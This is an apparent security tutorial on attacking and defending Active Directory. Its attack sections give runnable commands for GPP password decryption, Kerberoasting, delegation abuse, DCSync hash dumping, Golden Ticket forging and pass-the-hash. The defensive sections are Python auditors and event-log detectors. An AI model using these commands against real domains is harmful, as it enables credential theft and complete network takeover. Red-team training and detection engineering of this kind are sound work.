Mastering the Art of Active Directory Exploitation: A Comprehensive Red Team Deep Dive + Video


Introduction:

Active Directory (AD) is the backbone of identity and access management for over 90% of enterprises worldwide, making it the single most critical—and vulnerable—attack surface in modern network security. While it provides seamless authentication and centralized control, misconfigurations and inherent protocol weaknesses transform it into a goldmine for adversaries. This article dissects the anatomy of an AD attack chain, moving from initial reconnaissance to full domain compromise. By simulating both offensive techniques and defensive mitigations, we provide a technical roadmap for red teamers and a hardening guide for blue teams.

Learning Objectives:

  • Understand how to perform stealthy internal reconnaissance to map AD trusts and privileges.
  • Execute common Kerberos-based attacks (Kerberoasting, AS-REP Roasting) to crack service account hashes.
  • Leverage SYSVOL and Group Policy Preferences (GPP) for privilege escalation.
  • Utilize DCSync attacks to extract password hashes and achieve persistence.
  • Implement defensive commands and configurations to detect and mitigate these specific attack vectors.

You Should Know:

1. Initial Reconnaissance: Enumerating the Domain Without Logs

Before executing any exploit, an attacker must understand the landscape. Using minimal, non-intrusive tools is key to avoiding detection by Endpoint Detection and Response (EDR) solutions.

What it does: We will use native Windows tools and a lightweight PowerShell script to map domain admins, OU structure, and computers without writing malicious binaries to disk.

Step‑by‑step guide:

1. Identify the current user and domain context:

whoami
echo %USERDOMAIN%
net config workstation

2. Query Domain Controllers:

nltest /dclist:<domain>

3. Enumerate all users in the domain (using PowerShell to avoid `net user` triggers):

Get-ADUser -Filter * -Properties SamAccountName,Description,LastLogonDate | Select SamAccountName,Description

4. Check for “AdminCount” – users with privileged access:

Get-ADUser -Filter {AdminCount -eq 1} -Properties AdminCount,MemberOf

5. Map out all Domain Admins:

Get-ADGroupMember -Identity "Domain Admins" -Recursive

Note: On Linux, tools like `ldapsearch` or `bloodhound-python` can ingest this data for visualization in BloodHound.

2. Harvesting Credentials from SYSVOL and GPP

A common misconfiguration in older or poorly maintained domains is the storage of encrypted passwords in Group Policy Preferences (GPP). While Microsoft released a patch in 2014 (KB2962486) to prevent new credentials from being stored, existing ones often remain.

What it does: It locates the `Groups.xml` file in the SYSVOL share, which contains a password encrypted with a static, publicly known AES key.

Step‑by‑step guide:

1. Navigate to the SYSVOL share on a Domain Controller (if compromised) or accessible client:

dir \\<domain>\SYSVOL\<domain>\Policies


2. Search recursively for `Groups.xml`:

dir /s \\<domain>\SYSVOL\<domain>\Policies\groups.xml

3. Open the file and locate the `cpassword` attribute:

<Properties ... cpassword="AzV2Mx...==" .../>

4. Decrypt the password using a built-in PowerShell module (or online tools) on your attack machine:

# Load the GroupPolicy module (Get-GPPPassword itself ships with PowerSploit, not with this module)
Import-Module GroupPolicy
# Decrypt the cpassword
Get-GPPPassword -Path "\\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\Groups\Groups.xml"

Alternatively, use a Python script:

# On Kali Linux
gpp-decrypt "AzV2Mx...=="
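Defenders can run the same search over SYSVOL as a scheduled audit. The script below is an added example written for this article (not code from the original post or from the tools it names): it walks a SYSVOL tree, reports every Preferences XML element that still carries a non-empty `cpassword`, and deliberately does not decrypt anything. The directory layout, the two constructed `Groups.xml` files and the placeholder ciphertext are assumptions of the example.

```python
"""Audit a SYSVOL tree for Group Policy Preference files that still carry a
cpassword attribute. Added example for this article, not code from the original
post; it reports where such values exist and does not decrypt them.

Assumption (not from the article): SYSVOL is reachable as a local path or a
mounted share using the usual Policies/{GUID}/Machine|User/Preferences layout.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that can embed a cpassword value.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}


def find_cpassword(root_dir):
    """Return (relative path, element tag, account) for every element under
    root_dir whose cpassword attribute is non-empty."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                # A file that does not parse deserves a manual look, but it
                # cannot carry a usable cpassword for this check.
                continue
            for elem in tree.iter():
                if elem.get("cpassword"):  # cpassword="" means it was cleared
                    account = (elem.get("userName") or elem.get("accountName")
                               or elem.get("runAs") or "?")
                    rel = os.path.relpath(path, root_dir).replace(os.sep, "/")
                    findings.append((rel, elem.tag, account))
    return findings


# Constructed sample SYSVOL: one GPO that still stores a local admin password
# and one whose password was cleared. The ciphertext is a placeholder.
STALE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" status="LocalAdmin" changed="2013-02-01 10:00:00">
    <Properties action="U" userName="LocalAdmin" cpassword="CONSTRUCTED_BASE64_PLACEHOLDER"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
</Groups>
"""
CLEANED_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Helpdesk" status="Helpdesk" changed="2019-06-01 10:00:00">
    <Properties action="U" userName="Helpdesk" cpassword="" neverExpires="1"/>
  </User>
</Groups>
"""


def build_sample_sysvol():
    """Write the constructed files into a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    for guid, body in (("{GUID-A}", STALE_GROUPS_XML), ("{GUID-B}", CLEANED_GROUPS_XML)):
        d = os.path.join(root, "Policies", guid, "Machine", "Preferences", "Groups")
        os.makedirs(d)
        with open(os.path.join(d, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def demo():
    """Run the audit over the constructed tree; only the stale GPO is reported."""
    return find_cpassword(build_sample_sysvol())


if __name__ == "__main__":
    for path, tag, account in demo():
        print(f"cpassword present: {path} <{tag}> account={account}")
```

Point `find_cpassword` at the real SYSVOL path to audit a domain; every hit is a password that should be removed from the GPO and rotated on the affected hosts, since the patch mentioned above only stops new values from being written.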

3. Kerberoasting: Attacking Service Accounts

Kerberoasting is a post-exploitation technique that requests service tickets for accounts running services (like MSSQL or IIS) and cracks them offline. These accounts often run with elevated privileges.

What it does: A user with a valid domain account requests a Ticket Granting Service (TGS) ticket for a Service Principal Name (SPN). The ticket is encrypted with the service account’s NTLM hash, which can be extracted and brute-forced offline.

Step‑by‑step guide (Windows):

1. Identify all SPNs in the domain:

setspn -T <domain> -Q */*

2. Request service tickets with Rubeus, or with PowerView's `Get-DomainUser` and `Get-DomainSPNTicket` (which call the Kerberos APIs through `Add-Type`):

# Using PowerView (import first)
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat

This exports the tickets in a format ready for cracking.

Step‑by‑step guide (Linux):

1. Use Impacket’s `GetUserSPNs.py` to request TGS tickets:

# Syntax: GetUserSPNs.py <domain>/<user>:<password> -dc-ip <dc_ip> -request
GetUserSPNs.py corp.local/john.doe:Password123! -dc-ip 10.10.10.1 -request

2. Save the output to a file (e.g., hash.txt).

3. Crack the hash with Hashcat:

# Kerberos 5 TGS-REP etype 23 is mode 13100
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
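On the blue-team side, every one of these ticket requests is recorded in Security event 4769 on the Domain Controller. The detector below is an added example written for this article, not code from the original post; its sample events are constructed, and its two heuristics (RC4 tickets requested for user-account SPNs, and one requester pulling many distinct SPNs in a short window) are this example's assumptions rather than a vendor rule.

```python
"""Flag Kerberoasting-like activity in Windows Security event 4769 (a Kerberos
service ticket was requested). Added example for this article, not code from
the original post; the events are constructed, not captured.

Heuristics (assumptions of this example):
  1. a ticket for a user-account SPN requested with RC4-HMAC (etype 0x17),
     which stands out in a domain whose accounts otherwise get AES tickets;
  2. one requester obtaining tickets for many distinct SPNs in a short window,
     the footprint of "request every SPN" tooling.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"
SPN_BURST_THRESHOLD = 5              # distinct SPNs per requester ...
BURST_WINDOW = timedelta(minutes=2)  # ... within this window

# Constructed 4769 fields: (TimeCreated, Account Name, Service Name,
# Ticket Encryption Type, Failure Code). 0x0 means the request succeeded.
SAMPLE_4769 = [
    ("2024-05-01T09:00:01", "jdoe", "DC01$", "0x12", "0x0"),
    ("2024-05-01T09:00:03", "jdoe", "svc_sql", "0x17", "0x0"),
    ("2024-05-01T09:00:04", "jdoe", "svc_web", "0x17", "0x0"),
    ("2024-05-01T09:00:05", "jdoe", "svc_backup", "0x17", "0x0"),
    ("2024-05-01T09:00:06", "jdoe", "svc_iis", "0x17", "0x0"),
    ("2024-05-01T09:00:07", "jdoe", "svc_sccm", "0x17", "0x0"),
    ("2024-05-01T09:05:00", "alice", "svc_web", "0x12", "0x0"),
    ("2024-05-01T09:05:10", "bob", "svc_sql", "0x17", "0x1b"),
]


def is_user_spn(service_name):
    """Computer accounts ($) and krbtgt are excluded: their tickets are routine
    and their keys are not the crackable, human-chosen secrets Kerberoasting targets."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoast(events):
    """Return alert tuples: ("rc4_service_ticket", user, spn) or
    ("spn_burst", user, distinct_spn_count); the burst alert fires once per user."""
    alerts = []
    recent = defaultdict(list)  # requester -> [(time, spn)] inside the window
    burst_reported = set()
    for ts, user, service, etype, status in events:
        if status != "0x0" or not is_user_spn(service):
            continue
        t = datetime.fromisoformat(ts)
        if etype == RC4_HMAC:
            alerts.append(("rc4_service_ticket", user, service))
        recent[user] = [(t0, s) for t0, s in recent[user] if t - t0 <= BURST_WINDOW]
        recent[user].append((t, service))
        distinct = {s for _, s in recent[user]}
        if len(distinct) >= SPN_BURST_THRESHOLD and user not in burst_reported:
            burst_reported.add(user)
            alerts.append(("spn_burst", user, len(distinct)))
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_4769):
        print(alert)
```

The RC4 heuristic only works once service accounts are configured for AES (the `msDS-SupportedEncryptionTypes` attribute), at which point an RC4 request is an anomaly worth a ticket; the burst heuristic catches tooling regardless of encryption type. Both are cheaper to run than the attacker's cracking job, and the real mitigation is long, random service-account passwords, ideally via Group Managed Service Accounts.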

4. Exploiting Unconstrained and Constrained Delegation

Delegation allows a service to impersonate a user to access another service. If misconfigured, it leads to full domain compromise.

What it does: We check for computers/servers marked as “Trusted for Delegation”. If we compromise a server with unconstrained delegation, we can force a Domain Controller to authenticate to it, capturing the Domain Controller’s Ticket Granting Ticket (TGT) in memory.

Step‑by‑step guide:

1. Find delegation configurations:

# Find computers with unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
# Find users with constrained delegation (the AD filter cannot compare against $null, so match any value)
Get-ADUser -Filter 'msDS-AllowedToDelegateTo -like "*"' -Properties msDS-AllowedToDelegateTo

2. If you have admin access on a server with unconstrained delegation, use Rubeus to monitor for TGTs:

Rubeus.exe monitor /interval:1 /targetuser:DC01$

Then, use the `PrintBug` or `SpoolSample` exploit to force the Domain Controller to connect to your compromised server, capturing its TGT.
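The two `Get-AD*` queries above return the raw attributes; classifying them is where an audit earns its keep. The script below is an added example for this article, not code from the original post: the account records are constructed stand-ins for the `userAccountControl`, `msDS-AllowedToDelegateTo` and `adminCount` values an LDAP query would return, the bit values are the documented Active Directory flags, and the finding names are this example's own.

```python
"""Classify accounts by delegation setting and flag the risky combinations.
Added example for this article, not code from the original post; records are
constructed stand-ins for LDAP attribute values.
"""
# userAccountControl bits, as documented for Active Directory.
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000          # member computer
UF_SERVER_TRUST_ACCOUNT = 0x2000               # domain controller
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

# Constructed records: sAMAccountName, userAccountControl, msDS-AllowedToDelegateTo, adminCount.
SAMPLE_ACCOUNTS = [
    {"sam": "DC01$", "uac": 0x82000, "delegateTo": [], "adminCount": 0},
    {"sam": "WEB01$", "uac": 0x81000, "delegateTo": [], "adminCount": 0},
    {"sam": "svc_sql", "uac": 0x10200, "delegateTo": ["cifs/FS01.corp.local"], "adminCount": 0},
    {"sam": "svc_iis", "uac": 0x1010200, "delegateTo": ["http/WEB01.corp.local"], "adminCount": 0},
    {"sam": "da_admin", "uac": 0x10200, "delegateTo": [], "adminCount": 1},
    {"sam": "da_safe", "uac": 0x110200, "delegateTo": [], "adminCount": 1},
    {"sam": "jdoe", "uac": 0x10200, "delegateTo": [], "adminCount": 0},
]


def delegation_mode(acct):
    """Map the attribute combination to one delegation mode."""
    uac = acct["uac"]
    if uac & UF_SERVER_TRUST_ACCOUNT:
        return "domain_controller"  # DCs are trusted for delegation by design
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if acct["delegateTo"]:
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained_any_protocol"  # protocol transition: no user ticket needed
        return "constrained_kerberos_only"
    return "none"


def audit(accounts):
    """Return (sam, finding) pairs a reviewer should act on, in input order."""
    findings = []
    for acct in accounts:
        mode = delegation_mode(acct)
        if mode == "unconstrained":
            findings.append((acct["sam"], "unconstrained delegation on a non-DC host"))
        elif mode == "constrained_any_protocol":
            findings.append((acct["sam"], "constrained delegation with protocol transition to "
                             + ", ".join(acct["delegateTo"])))
        # Privileged accounts should carry NOT_DELEGATED so no server can impersonate them.
        if acct["adminCount"] == 1 and not (acct["uac"] & UF_NOT_DELEGATED):
            findings.append((acct["sam"], "privileged account not marked NOT_DELEGATED"))
    return findings


if __name__ == "__main__":
    for sam, finding in audit(SAMPLE_ACCOUNTS):
        print(f"{sam}: {finding}")
```

The two fixes that follow from the findings are the ones the attack above depends on: replace unconstrained delegation on member servers with resource-based or constrained delegation, and put every Tier 0 account in the Protected Users group or set its "sensitive and cannot be delegated" flag, so that even a captured TGT from that server cannot be used on the account's behalf.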

5. DCSync: The Ultimate Domain Persistence

The DCSync attack simulates the behavior of a Domain Controller and requests replication of password hashes from a legitimate DC. This requires high privileges (like Domain Admins or specific Replication-Get-Changes-All rights) but provides persistent access.

What it does: It uses the Directory Replication Service (DRS) Remote Protocol to replicate user credentials (hashes) without logging into the Domain Controller itself.

Step‑by‑step guide (using Impacket on Linux):

1. From a compromised machine with Domain Admin credentials, run:

# Dump all domain hashes
secretsdump.py <domain>/<user>@<dc_ip> -just-dc
# To target a specific user
secretsdump.py <domain>/<user>@<dc_ip> -just-dc-user krbtgt

2. Use the extracted `krbtgt` hash to create a Golden Ticket, granting access to any resource in the domain.

# Using Impacket ticketer
ticketer.py -nthash <krbtgt_nt_hash> -domain-sid <domain_sid> -domain <domain> Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py <domain>/Administrator@<dc_fqdn> -k -no-pass

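Because the DC answers a DCSync request like any other replication partner, the place to catch it is the audit trail: with "Audit Directory Service Access" enabled, the request appears as Security event 4662 on the domain object with the replication extended rights listed under Properties. The detector below is an added example for this article, not code from the original post; the events are constructed, and the allow-list of DC computer accounts is an assumption that has to be maintained from the real domain.

```python
"""Detect DCSync-style replication requests in Windows Security event 4662
(an operation was performed on an object). Added example for this article, not
code from the original post; the events are constructed, not captured logs.

Assumptions: "Audit Directory Service Access" is enabled so 4662 is produced,
and the allow-list holds the real DC computer accounts (plus any sanctioned
directory-sync account) of the domain.
"""
import re

# Extended-rights GUIDs a DCSync needs; these are the well-known AD values.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{?([0-9a-fA-F-]{36})\}?")

# Constructed allow-list: accounts expected to replicate (domain controllers).
SANCTIONED_REPLICATORS = {"DC01$", "DC02$"}

# Constructed 4662 fields: (Subject Account Name, Object Type, Properties),
# with Properties in the multi-line form Event Viewer shows.
SAMPLE_4662 = [
    ("DC02$", "domainDNS",
     "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    ("jdoe", "domainDNS",
     "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # An unrelated property GUID on a user object: ordinary directory access.
    ("alice", "user", "Read Property\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"),
]


def replication_rights_in(properties):
    """Return the names of replication rights referenced in a Properties field."""
    return {REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS}


def detect_dcsync(events):
    """Return (subject, object type, sorted rights) for every replication request
    that did not come from a sanctioned replicator."""
    alerts = []
    for subject, obj_type, properties in events:
        rights = replication_rights_in(properties)
        if not rights or subject in SANCTIONED_REPLICATORS:
            continue  # no replication right asked for, or normal DC-to-DC traffic
        alerts.append((subject, obj_type, sorted(rights)))
    return alerts


if __name__ == "__main__":
    for subject, obj_type, rights in detect_dcsync(SAMPLE_4662):
        print(f"possible DCSync by {subject} on {obj_type}: {', '.join(rights)}")
```

A single non-DC account asking for Get-Changes-All (or Get-Changes together with Get-Changes-In-Filtered-Set) is the signal; in practice the allow-list is the only tuning needed, and the complementary control is to review who holds those rights on the domain head in the first place.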

6. Lateral Movement: Pass-the-Hash and WMI

Once you have a hash (NTLM), you don’t always need the plaintext password. Pass-the-Hash (PtH) allows you to authenticate to other machines.

What it does: It leverages the NTLM authentication mechanism by using the hash directly to establish a connection.

Step‑by‑step guide:

1. On Windows, use Mimikatz or Invoke-TheHash to execute commands:

# Using Invoke-TheHash (PowerShell)
Invoke-SMBExec -Target 10.10.10.50 -Domain corp.local -Username Administrator -Hash <ntlm_hash> -Command "whoami"

2. On Linux, use Impacket's psexec.py, wmiexec.py, or smbexec.py:

# Execute a command via WMI
wmiexec.py -hashes :<ntlm_hash> <domain>/<user>@<target_ip>

Once inside, establish persistence by creating a local admin or dumping LSASS memory.

What Undercode Say:

  • Assume Breach, Protect Privilege: The attack chain demonstrates that once a standard workstation is compromised, the path to Domain Admin is often paved by legacy configurations (GPP), weak service account passwords (Kerberoasting), and inherent protocol trusts (Delegation). Segmentation and tiering are not optional; they are mandatory to stop lateral movement.
  • Visibility is Your Shield: The most effective defense against the techniques above is auditing and monitoring. Enabling advanced audit policies for Kerberos service ticket operations (Event ID 4769), replication attempts (Event ID 4662), and changes to privileged groups provides the necessary telemetry to detect these attacks in progress, often before they succeed.

Prediction:

As on-premises Active Directory environments increasingly hybridize with Azure AD, the attack surface is shifting from the traditional `NTLM` and `Kerberos` protocols to include OAuth and SAML token manipulation. We predict a rise in “Cloud Kerberoasting,” where attackers target service principals in Entra ID (Azure AD) with high API permissions. The next wave of domain dominance will involve federated identity compromises, requiring defenders to master cloud-native identity protection tools like Conditional Access and Identity Protection, moving beyond the traditional perimeter of the Domain Controller.

Reported By: Sinan Daglar – Hackers Feeds